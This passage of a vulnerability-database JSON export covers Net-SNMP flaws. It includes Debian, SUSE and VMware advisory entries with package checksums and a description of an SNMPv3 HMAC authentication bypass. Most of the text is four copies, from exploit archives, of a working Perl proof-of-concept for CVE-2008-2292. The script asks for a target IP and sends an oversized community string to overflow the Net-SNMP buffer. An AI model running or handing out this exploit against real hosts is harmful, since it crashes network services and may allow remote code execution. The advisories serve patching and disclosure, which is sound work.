3b7ac7b8fe0da1a3909ee56aba46d464\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9_5.2.3-7etch4_ia64.deb\n Size/MD5 checksum: 2205680 6868a56b1db04627e6921bf7237939a2\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-perl_5.2.3-7etch4_ia64.deb\n Size/MD5 checksum: 970440 783f0cccabfbcc63590730b3803d164d\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9-dev_5.2.3-7etch4_ia64.deb\n Size/MD5 checksum: 2281114 fd04b505755a3aed0fe4c9baaac84500\n http://security.debian.org/pool/updates/main/n/net-snmp/snmpd_5.2.3-7etch4_ia64.deb\n Size/MD5 checksum: 842690 9f9ca89c3d3ba7c46481e9cd39c242a6\n http://security.debian.org/pool/updates/main/n/net-snmp/snmp_5.2.3-7etch4_ia64.deb\n Size/MD5 checksum: 962854 c8a32f808d719357a5b6350e2b60794e\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-perl_5.2.3-7etch4_mips.deb\n Size/MD5 checksum: 895414 5dd919d188291cb3727d39b5e06c9e26\n http://security.debian.org/pool/updates/main/n/net-snmp/snmp_5.2.3-7etch4_mips.deb\n Size/MD5 checksum: 927342 28c245db4d8ea82ba4075b27d674d72a\n http://security.debian.org/pool/updates/main/n/net-snmp/snmpd_5.2.3-7etch4_mips.deb\n Size/MD5 checksum: 833182 0e0b21e13d77de82bed7a38d30f65e4b\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9-dev_5.2.3-7etch4_mips.deb\n Size/MD5 checksum: 1769524 24bdc73a3d20c4046c7741957442c713\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9_5.2.3-7etch4_mips.deb\n Size/MD5 checksum: 1717562 977ae5c34a127d32d8f2bf222de9a431\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9-dev_5.2.3-7etch4_mipsel.deb\n Size/MD5 checksum: 1755032 cab5c112911465a9ce23a0d2ea44ded9\n http://security.debian.org/pool/updates/main/n/net-snmp/snmp_5.2.3-7etch4_mipsel.deb\n Size/MD5 checksum: 926616 2bf14a3fe74d9f2a523aacc8b04f5282\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-perl_5.2.3-7etch4_mipsel.deb\n Size/MD5 checksum: 895194 b7c9ed37bf83ad92371f5472ac5d917b\n http://security.debian.org/pool/updates/main/n/net-snmp/snmpd_5.2.3-7etch4_mipsel.deb\n Size/MD5 checksum: 833098 08b63ba6c3becf25ba2f941a532a7b71\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9_5.2.3-7etch4_mipsel.deb\n Size/MD5 checksum: 1720642 1ff7568eb478edee923edb76cf42e9ac\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/n/net-snmp/snmp_5.2.3-7etch4_powerpc.deb\n Size/MD5 checksum: 941434 bbac9384bd7f88339e2b86fa665208c1\n http://security.debian.org/pool/updates/main/n/net-snmp/snmpd_5.2.3-7etch4_powerpc.deb\n Size/MD5 checksum: 835212 4790d79f8de7f1bee7aabf0473f25268\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9-dev_5.2.3-7etch4_powerpc.deb\n Size/MD5 checksum: 1657890 b91fcf52e80c7196cea0c13df9ac79ef\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9_5.2.3-7etch4_powerpc.deb\n Size/MD5 checksum: 1803262 4d298c9509941390c7b2eb68320ad211\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-perl_5.2.3-7etch4_powerpc.deb\n Size/MD5 checksum: 928170 b17966a6a61313344ac827b58f32eeef\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9-dev_5.2.3-7etch4_s390.deb\n Size/MD5 checksum: 1409718 2a128cbdce2522ef49604255cff41af2\n http://security.debian.org/pool/updates/main/n/net-snmp/snmp_5.2.3-7etch4_s390.deb\n Size/MD5 checksum: 931452 d3bb7c3a849cd2b35fa6e4acb19c318d\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9_5.2.3-7etch4_s390.deb\n Size/MD5 checksum: 1834914 67e5b946df18b06b41b3e108d5ddc4e3\n http://security.debian.org/pool/updates/main/n/net-snmp/snmpd_5.2.3-7etch4_s390.deb\n Size/MD5 checksum: 836102 7a4b85e8ea0e50d7213997b5f7d6309f\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-perl_5.2.3-7etch4_s390.deb\n Size/MD5 checksum: 903864 3f80e78e4e2672aacf3da0690ff24b79\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/n/net-snmp/snmp_5.2.3-7etch4_sparc.deb\n Size/MD5 checksum: 925336 5824ea607689f3f1bd62a9e6e28f95ae\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9-dev_5.2.3-7etch4_sparc.deb\n Size/MD5 checksum: 1548630 1378d1cf730d3026bc1f01a4ab2ccedb\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-perl_5.2.3-7etch4_sparc.deb\n Size/MD5 checksum: 918592 28a086f6aa2ee8d510b38c1a177843fc\n http://security.debian.org/pool/updates/main/n/net-snmp/snmpd_5.2.3-7etch4_sparc.deb\n Size/MD5 checksum: 834186 068cbf2b4774ecf9504b820db26e6f1d\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9_5.2.3-7etch4_sparc.deb\n Size/MD5 checksum: 1782014 d39fae5fe0d1397a2a1bd7397d6e850a\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 7, "modified": "2008-11-09T09:49:25", "published": "2008-11-09T09:49:25", "id": "DEBIAN:DSA-1663-1:B5819", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00255.html", "title": "[SECURITY] [DSA 1663-1] New net-snmp packages fix several vulnerabilities", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T11:40:57", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1291", "CVE-2008-1290", "CVE-2008-2292", "CVE-2008-0960", "CVE-2008-1292"], "description": "The net-snmp daemon implements the \"simple network management protocol\". The version 3 of SNMP as implemented in net-snmp uses the length of the HMAC in a packet to verify against a local HMAC for authentication. An attacker can therefore send a SNMPv3 packet with a one byte HMAC and guess the correct first byte of the local HMAC with 256 packets (max).\n#### Solution\nPlease install the update package.", "edition": 1, "modified": "2008-08-01T13:33:56", "published": "2008-08-01T13:33:56", "id": "SUSE-SA:2008:039", "href": "http://lists.opensuse.org/opensuse-security-announce/2008-08/msg00000.html", "title": "authentication bypass, denial-of-service in net-snmp", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "vmware": [{"lastseen": "2019-11-06T16:05:52", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1927", "CVE-2008-2292", "CVE-2007-3108", "CVE-2007-5135", "CVE-2008-0960"], "description": "I Security Issues \na. OpenSSL Binaries Updated \nThis fix updates the third party OpenSSL library. \nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2007-3108 and CVE-2007-5135 to the issues addressed by this update. \n\n", "edition": 4, "modified": "2008-09-18T00:00:00", "published": "2008-08-12T00:00:00", "id": "VMSA-2008-0013", "href": "https://www.vmware.com/security/advisories/VMSA-2008-0013.html", "title": "Updated ESX packages for OpenSSL, net-snmp, perl", "type": "vmware", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:18:55", "description": "", "published": "2008-11-12T00:00:00", "type": "packetstorm", "title": "netsnmp-overflow.txt", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-2292"], "modified": "2008-11-12T00:00:00", "id": "PACKETSTORM:71884", "href": "https://packetstormsecurity.com/files/71884/netsnmp-overflow.txt.html", "sourceData": "`#!usr/bin/perl -w \n \n################################################################################################################ \n# Buffer overflow in the __snprint_value function in snmp_get in Net-SNMP 5.1.4, 5.2.4, and 5.4.1, \n# as used in SNMP.xs for Perl, allows remote attackers to cause a denial of service (crash) and \n# possibly execute arbitrary code via a large OCTETSTRING in an attribute value pair (AVP). \n# \n# Refer: \n# http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2292 \n# http://www.securityfocus.com/bid/29212/discuss \n# \n# \n# To run this exploit on MS Windows replace \"#!usr/bin/perl -w\" with \"#!Installation_path_for_perl -w\" \n# (say #!C:/Program Files/Perl/bin/perl -w) \n# \n# This was strictly written for educational purpose. Use it at your own risk. \n# Author will not bare any responsibility for any damages watsoever. \n# \n# Author: Praveen Darshanam \n# Email: praveen[underscore]recker[at]sify.com \n# Date: 11th November, 2008 \n# \n# NOTE: Thanks to all my colleagues at iPolicy Networks for making this possible \n# For reliable security solutions please visit http://www.ipolicynetworks.com/ \n# \n################################################################################################################## \n \nuse Net::SNMP; \n \nprintf(\"\\nEnter the IP Adress of Vulnerable SNMP Manager Agent: \"); \n$host_vulnerable = <STDIN>; \n$port = 161; \n#default SNMP port \n$community = \"D\" x 5000; \n \n($session, $error) = Net::SNMP->session( \n-hostname => $host_vulnerable, \n-port => $port, \n-community => $community, \n-maxmsgsize => 7000, \n); \nif (!defined($session)) \n{ \nprintf(\"ERROR: %s.\\n\", $error); \nexit 1; \n} \n \n$sysUpTime = '1.3.6.1.2.1.1.3.0'; \n$snmp_mal_request = $session->get_request( \n-varbindlist => [$sysUpTime], \n); \n \nif (!defined($snmp_mal_request)) { \nprintf(\"ERROR: %s.\\n\", $session->error); \n$session->close; \nexit 1; \n} \n \n$session->close; \n \n \n`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/71884/netsnmp-overflow.txt"}], "seebug": [{"lastseen": "2017-11-19T21:20:58", "description": "No description provided by source.", "published": "2008-11-13T00:00:00", "title": "Net-SNMP <= 5.1.4/5.2.4/5.4.1 Perl Module Buffer Overflow PoC", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-2292"], "modified": "2008-11-13T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-10021", "id": "SSV:10021", "sourceData": "\n #!usr/bin/perl -w\r\n\r\n################################################################################################################\r\n# Buffer overflow in the __snprint_value function in snmp_get in Net-SNMP 5.1.4, 5.2.4, and 5.4.1,\r\n# as used in SNMP.xs for Perl, allows remote attackers to cause a denial of service (crash) and\r\n# possibly execute arbitrary code via a large OCTETSTRING in an attribute value pair (AVP).\r\n#\r\n# Refer:\r\n# http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2292\r\n# http://www.securityfocus.com/bid/29212/discuss\r\n#\r\n#\r\n# To run this exploit on MS Windows replace "#!usr/bin/perl -w" with "#!Installation_path_for_perl -w"\r\n# (say #!C:/Program Files/Perl/bin/perl -w)\r\n#\r\n# This was strictly written for educational purpose. Use it at your own risk.\r\n# Author will not bare any responsibility for any damages watsoever.\r\n#\r\n# Author: Praveen Darshanam\r\n# Email: praveen[underscore]recker[at]sify.com\r\n# Date: 11th November, 2008\r\n#\r\n# NOTE: Thanks to all my colleagues at iPolicy Networks for making this possible\r\n# For reliable security solutions please visit http://www.ipolicynetworks.com/\r\n#\r\n##################################################################################################################\r\n\r\nuse Net::SNMP;\r\n\r\nprintf("\\nEnter the IP Adress of Vulnerable SNMP Manager Agent: ");\r\n$host_vulnerable = <STDIN>;\r\n$port = 161;\r\n#default SNMP port\r\n$community = "D" x 5000;\r\n\r\n($session, $error) = Net::SNMP->session(\r\n -hostname => $host_vulnerable,\r\n -port => $port,\r\n -community => $community,\r\n -maxmsgsize => 7000,\r\n );\r\n if (!defined($session))\r\n {\r\n printf("ERROR: %s.\\n", $error);\r\n exit 1;\r\n }\r\n\r\n$sysUpTime = '1.3.6.1.2.1.1.3.0';\r\n$snmp_mal_request = $session->get_request(\r\n -varbindlist => [$sysUpTime],\r\n );\r\n\r\n if (!defined($snmp_mal_request)) {\r\n printf("ERROR: %s.\\n", $session->error);\r\n $session->close;\r\n exit 1;\r\n }\r\n\r\n$session->close;\n ", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-10021"}, {"lastseen": "2017-11-19T15:37:00", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Net-SNMP <= 5.1.4/5.2.4/5.4.1 Perl Module Buffer Overflow PoC", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-2292"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-65930", "id": "SSV:65930", "sourceData": "\n #!usr/bin/perl -w\r\n\r\n################################################################################################################\r\n# Buffer overflow in the __snprint_value function in snmp_get in Net-SNMP 5.1.4, 5.2.4, and 5.4.1,\r\n# as used in SNMP.xs for Perl, allows remote attackers to cause a denial of service (crash) and\r\n# possibly execute arbitrary code via a large OCTETSTRING in an attribute value pair (AVP).\r\n#\r\n# Refer:\r\n# http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2292\r\n# http://www.securityfocus.com/bid/29212/discuss\r\n#\r\n#\r\n# To run this exploit on MS Windows replace "#!usr/bin/perl -w" with "#!Installation_path_for_perl -w"\r\n# (say #!C:/Program Files/Perl/bin/perl -w)\r\n#\r\n# This was strictly written for educational purpose. Use it at your own risk.\r\n# Author will not bare any responsibility for any damages watsoever.\r\n#\r\n# Author: Praveen Darshanam\r\n# Email: praveen[underscore]recker[at]sify.com\r\n# Date: 11th November, 2008\r\n#\r\n# NOTE: Thanks to all my colleagues at iPolicy Networks for making this possible\r\n# For reliable security solutions please visit http://www.ipolicynetworks.com/\r\n#\r\n##################################################################################################################\r\n\r\nuse Net::SNMP;\r\n\r\nprintf("\\nEnter the IP Adress of Vulnerable SNMP Manager Agent: ");\r\n$host_vulnerable = <STDIN>;\r\n$port = 161;\r\n#default SNMP port\r\n$community = "D" x 5000;\r\n\r\n($session, $error) = Net::SNMP->session(\r\n -hostname => $host_vulnerable,\r\n -port => $port,\r\n -community => $community,\r\n -maxmsgsize => 7000,\r\n );\r\n if (!defined($session))\r\n {\r\n printf("ERROR: %s.\\n", $error);\r\n exit 1;\r\n }\r\n\r\n$sysUpTime = '1.3.6.1.2.1.1.3.0';\r\n$snmp_mal_request = $session->get_request(\r\n -varbindlist => [$sysUpTime],\r\n );\r\n\r\n if (!defined($snmp_mal_request)) {\r\n printf("ERROR: %s.\\n", $session->error);\r\n $session->close;\r\n exit 1;\r\n }\r\n\r\n$session->close;\r\n\r\n# milw0rm.com [2008-11-12]\r\n\n ", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-65930"}, {"lastseen": "2017-11-19T21:34:54", "description": "BUGTRAQ ID: \r\nCVE ID\uff1aCVE-2008-2292\r\nCNCVE ID\uff1aCNCVE-20082292\r\n\r\nSun Solaris\u662f\u4e00\u6b3e\u5546\u4e1a\u6027\u8d28\u7684Unix\u64cd\u4f5c\u7cfb\u7edf\u3002\r\nSun Solaris\u7cfb\u7edf\u7ba1\u7406\u4ee3\u7406(SMA)SNMP\u5b88\u62a4\u7a0b\u5e8f\u5b58\u5728\u7f13\u51b2\u533a\u6ea2\u51fa\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6f0f\u6d1e\u5bf9\u670d\u52a1\u7a0b\u5e8f\u8fdb\u884c\u62d2\u7edd\u670d\u52a1\u653b\u51fb\uff0c\u6216\u4ee5\u5e94\u7528\u7a0b\u5e8f\u6743\u9650\u6267\u884c\u4efb\u610f\u6307\u4ee4\u3002\r\n\u76ee\u524d\u6ca1\u6709\u8be6\u7ec6\u6f0f\u6d1e\u7ec6\u8282\u63d0\u4f9b\u3002\n\nSun Solaris 10\n \u53ef\u53c2\u8003\u5982\u4e0b\u5b89\u5168\u516c\u544a\u83b7\u5f97\u8865\u4e01\u4fe1\u606f\uff1a\r\n<a href=http://sunsolve.sun.com/search/document.do?assetkey=1-66-239785-1 target=_blank>http://sunsolve.sun.com/search/document.do?assetkey=1-66-239785-1</a>", "published": "2008-07-21T00:00:00", "title": "Sun Solaris\u7cfb\u7edf\u7ba1\u7406\u4ee3\u7406SNMP\u5b88\u62a4\u7a0b\u5e8f\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-2292"], "modified": "2008-07-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-3688", "id": "SSV:3688", "sourceData": "", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": ""}], "exploitpack": [{"lastseen": "2020-04-01T19:04:37", "description": "\nNet-SNMP 5.1.45.2.45.4.1 Perl Module - Buffer Overflow (PoC)", "edition": 1, "published": "2008-11-12T00:00:00", "title": "Net-SNMP 5.1.45.2.45.4.1 Perl Module - Buffer Overflow (PoC)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-2292"], "modified": "2008-11-12T00:00:00", "id": "EXPLOITPACK:0561588B435B0A5C5AA1C92F379FF6D4", "href": "", "sourceData": "#!usr/bin/perl -w\n\n################################################################################################################\n# Buffer overflow in the __snprint_value function in snmp_get in Net-SNMP 5.1.4, 5.2.4, and 5.4.1,\n# as used in SNMP.xs for Perl, allows remote attackers to cause a denial of service (crash) and\n# possibly execute arbitrary code via a large OCTETSTRING in an attribute value pair (AVP).\n#\n# Refer:\n# http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2292\n# https://www.securityfocus.com/bid/29212/discuss\n#\n#\n# To run this exploit on MS Windows replace \"#!usr/bin/perl -w\" with \"#!Installation_path_for_perl -w\"\n# (say #!C:/Program Files/Perl/bin/perl -w)\n#\n# This was strictly written for educational purpose. Use it at your own risk.\n# Author will not bare any responsibility for any damages watsoever.\n#\n# Author: Praveen Darshanam\n# Email: praveen[underscore]recker[at]sify.com\n# Date: 11th November, 2008\n#\n# NOTE: Thanks to all my colleagues at iPolicy Networks for making this possible\n# For reliable security solutions please visit http://www.ipolicynetworks.com/\n#\n##################################################################################################################\n\nuse Net::SNMP;\n\nprintf(\"\\nEnter the IP Adress of Vulnerable SNMP Manager Agent: \");\n$host_vulnerable = <STDIN>;\n$port = 161;\n#default SNMP port\n$community = \"D\" x 5000;\n\n($session, $error) = Net::SNMP->session(\n -hostname => $host_vulnerable,\n -port => $port,\n -community => $community,\n -maxmsgsize => 7000,\n );\n if (!defined($session))\n {\n printf(\"ERROR: %s.\\n\", $error);\n exit 1;\n }\n\n$sysUpTime = '1.3.6.1.2.1.1.3.0';\n$snmp_mal_request = $session->get_request(\n -varbindlist => [$sysUpTime],\n );\n\n if (!defined($snmp_mal_request)) {\n printf(\"ERROR: %s.\\n\", $session->error);\n $session->close;\n exit 1;\n }\n\n$session->close;\n\n# milw0rm.com [2008-11-12]", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-01T01:24:43", "description": "Net-SNMP <= 5.1.4/5.2.4/5.4.1 Perl Module Buffer Overflow PoC. CVE-2008-2292. Dos exploit for linux platform", "published": "2008-11-12T00:00:00", "type": "exploitdb", "title": "Net-SNMP <= 5.1.4/5.2.4/5.4.1 Perl Module Buffer Overflow PoC", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-2292"], "modified": "2008-11-12T00:00:00", "id": "EDB-ID:7100", "href": "https://www.exploit-db.com/exploits/7100/", "sourceData": "#!usr/bin/perl -w\n\n################################################################################################################\n# Buffer overflow in the __snprint_value function in snmp_get in Net-SNMP 5.1.4, 5.2.4, and 5.4.1,\n# as used in SNMP.xs for Perl, allows remote attackers to cause a denial of service (crash) and\n# possibly execute arbitrary code via a large OCTETSTRING in an attribute value pair (AVP).\n#\n# Refer:\n# http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2292\n# http://www.securityfocus.com/bid/29212/discuss\n#\n#\n# To run this exploit on MS Windows replace \"#!usr/bin/perl -w\" with \"#!Installation_path_for_perl -w\"\n# (say #!C:/Program Files/Perl/bin/perl -w)\n#\n# This was strictly written for educational purpose. Use it at your own risk.\n# Author will not bare any responsibility for any damages watsoever.\n#\n# Author: Praveen Darshanam\n# Email: praveen[underscore]recker[at]sify.com\n# Date: 11th November, 2008\n#\n# NOTE: Thanks to all my colleagues at iPolicy Networks for making this possible\n# For reliable security solutions please visit http://www.ipolicynetworks.com/\n#\n##################################################################################################################\n\nuse Net::SNMP;\n\nprintf(\"\\nEnter the IP Adress of Vulnerable SNMP Manager Agent: \");\n$host_vulnerable = <STDIN>;\n$port = 161;\n#default SNMP port\n$community = \"D\" x 5000;\n\n($session, $error) = Net::SNMP->session(\n -hostname => $host_vulnerable,\n -port => $port,\n -community => $community,\n -maxmsgsize => 7000,\n );\n if (!defined($session))\n {\n printf(\"ERROR: %s.\\n\", $error);\n exit 1;\n }\n\n$sysUpTime = '1.3.6.1.2.1.1.3.0';\n$snmp_mal_request = $session->get_request(\n -varbindlist => [$sysUpTime],\n );\n\n if (!defined($snmp_mal_request)) {\n printf(\"ERROR: %s.\\n\", $session->error);\n $session->close;\n exit 1;\n }\n\n$session->close;\n\n# milw0rm.com [2008-11-12]\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/7100/"}]}
